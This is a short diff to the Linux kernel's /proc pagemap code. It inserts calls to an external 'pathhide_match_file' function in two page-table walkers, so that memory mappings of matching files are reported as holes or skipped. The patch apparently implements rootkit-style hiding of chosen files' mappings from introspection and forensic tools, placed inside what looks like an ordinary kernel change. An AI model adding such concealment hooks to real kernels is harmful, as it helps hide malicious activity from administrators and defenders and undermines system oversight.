--- a/fs/proc/task_mmu.c
+++ b/fs/proc/task_mmu.c
@@ -1929,6 +1929,10 @@
 	spinlock_t *ptl;
 	pte_t *pte, *orig_pte;
 	int err = 0;
+	extern bool pathhide_match_file(struct file *file);
+
+	if (vma->vm_file && pathhide_match_file(vma->vm_file))
+		return pagemap_pte_hole(addr, end, -1, walk);
 #ifdef CONFIG_TRANSPARENT_HUGEPAGE
 
 	ptl = pmd_trans_huge_lock(pmdp, vma);
@@ -2525,6 +2529,10 @@
 	unsigned long vma_category = 0;
 	bool wp_allowed = userfaultfd_wp_async(vma) &&
 	    userfaultfd_wp_use_markers(vma);
+	extern bool pathhide_match_file(struct file *file);
+
+	if (vma->vm_file && pathhide_match_file(vma->vm_file))
+		return 1;
 
 	if (!wp_allowed) {
 		/* User requested explicit failure over wp-async capability */
